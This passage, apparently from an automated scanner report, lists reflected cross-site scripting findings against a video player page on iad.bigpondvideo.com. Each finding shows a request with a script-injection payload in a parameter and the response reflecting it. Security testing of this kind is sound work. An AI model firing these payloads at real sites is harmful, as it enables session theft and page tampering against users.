
Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iadc4900</script><script>alert(1)</script>29e14056bb3&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:15:02 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8677

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
w=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iadc4900</script><script>alert(1)</script>29e14056bb3&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html&randId=43&os=MacOs&showOverlays=1&debug=0'+"&screenWidth
...[SNIP]...

2.540. http://iad.bigpondvideo.com/indexInfinityPlayer.php [errorFontColor parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the errorFontColor request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8784</script><script>alert(1)</script>f26df97d870 was submitted in the errorFontColor parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFFd8784</script><script>alert(1)</script>f26df97d870&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:11:20 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8677

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
wmode','transparent'
                               , 'flashvars','randFlashId=43&platform=Production&phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFFd8784</script><script>alert(1)</script>f26df97d870&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMe
...[SNIP]...

2.541. http://iad.bigpondvideo.com/indexInfinityPlayer.php [errorFontSize parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the errorFontSize request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3af0a</script><script>alert(1)</script>6d9e149d8df was submitted in the errorFontSize parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=143af0a</script><script>alert(1)</script>6d9e149d8df&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:11:25 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8677

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
nt'
                               , 'flashvars','randFlashId=43&platform=Production&phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=143af0a</script><script>alert(1)</script>6d9e149d8df&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuff
...[SNIP]...

2.542. http://iad.bigpondvideo.com/indexInfinityPlayer.php [flv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the flv request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2706</script><script>alert(1)</script>9dd3ace55d5 was submitted in the flv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0e2706</script><script>alert(1)</script>9dd3ace55d5&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:13:38 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8677

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0e2706</script><script>alert(1)</script>9dd3ace55d5&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com
...[SNIP]...

2.543. http://iad.bigpondvideo.com/indexInfinityPlayer.php [fontColor parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the fontColor request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70de1</script><script>alert(1)</script>b2b49afedce was submitted in the fontColor parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=66666670de1</script><script>alert(1)</script>b2b49afedce&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:12:02 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8677

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
nId=380abd2fbc8eacecfbf921d86b600b0a&phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=66666670de1</script><script>alert(1)</script>b2b49afedce&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal
...[SNIP]...

2.544. http://iad.bigpondvideo.com/indexInfinityPlayer.php [fontSize parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the fontSize request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5655a</script><script>alert(1)</script>7c5218c05bd was submitted in the fontSize parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=145655a</script><script>alert(1)</script>7c5218c05bd&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:12:08 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8677

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
bc8eacecfbf921d86b600b0a&phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=145655a</script><script>alert(1)</script>7c5218c05bd&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000
...[SNIP]...

2.545. http://iad.bigpondvideo.com/indexInfinityPlayer.php [fullScreen parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the fullScreen request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79bef</script><script>alert(1)</script>16230c5dc6b was submitted in the fullScreen parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=179bef</script><script>alert(1)</script>16230c5dc6b&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:13:52 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8727

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
itleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=179bef</script><script>alert(1)</script>16230c5dc6b&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http://ia
...[SNIP]...

2.546. http://iad.bigpondvideo.com/indexInfinityPlayer.php [fullScreen parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the fullScreen request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7657f</script><script>alert(1)</script>6330f087c0e was submitted in the fullScreen parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=17657f</script><script>alert(1)</script>6330f087c0e&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:13:48 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8727

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
<script type="text/javascript">
var ua                        = navigator.userAgent.toLowerCase();
var allowFullScreen            = "17657f</script><script>alert(1)</script>6330f087c0e";
var allowStf                = "0";
var assetColor                = "";
var assetLoadedTimeout;
var controlsType            = "internal";
var cStyle                    = "5";
var defaultLeftMargin        = 0;
var domain                    = "http://iad.bigpon
...[SNIP]...

2.547. http://iad.bigpondvideo.com/indexInfinityPlayer.php [height parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the height request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30e71"><script>alert(1)</script>48343e38125 was submitted in the height parameter. This input was echoed as 30e71\"><script>alert(1)</script>48343e38125 in the application's response. The backslash inserted before the quote is characteristic of SQL-style quote escaping (PHP's addslashes or magic_quotes), which gives no protection in HTML output: a backslash is not an escape character inside an attribute value, so the double quote still terminates the style attribute, the > closes the div tag, and the injected script element is parsed as markup.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=27230e71"><script>alert(1)</script>48343e38125&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:14:14 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8821

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
<div id="flashOverlayTrans" style="width:346px; height:27230e71\"><script>alert(1)</script>48343e38125px;text-align:left">
...[SNIP]...

2.548. http://iad.bigpondvideo.com/indexInfinityPlayer.php [height parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the height request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5512c</script><script>alert(1)</script>f9052c80859 was submitted in the height parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

